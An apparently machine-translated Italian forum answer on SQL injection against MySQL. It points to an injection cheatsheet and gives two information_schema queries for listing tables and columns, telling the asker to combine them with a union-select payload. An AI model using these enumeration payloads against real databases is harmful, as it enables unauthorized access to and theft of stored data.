Controlla il tuo link pubblicato. Ha una sezione in cui descrive in dettaglio ciò che stai chiedendo. Con alcune modifiche questo dovrebbe essere applicabile anche ai nomi delle colonne.
trova i nomi delle tabelle
Dai un'occhiata alla seguente pagina web sql-injection cheatsheet che dovrebbe dare abbastanza idee su come ottenere cosa stai cercando.
Ecco un esempio per MySQL db (dovrai combinarli con il tuo carico utile, ad es. "unione seleziona ... e 1 = '1 o simile):
Elenca colonne:
SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema !=
‘information_schema’
Tabelle elenco:
SELECT table_schema,table_name FROM information_schema.tables
WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Basta google per sql-injection + cheatsheet + enumeration. Questo dovrebbe darti molte informazioni aggiuntive.